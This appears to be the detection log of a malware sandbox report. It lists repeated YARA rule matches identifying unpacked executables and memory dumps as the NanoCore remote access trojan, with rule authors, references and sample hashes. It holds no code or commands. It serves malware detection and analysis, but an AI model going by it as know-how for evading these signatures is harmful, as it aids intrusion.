      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
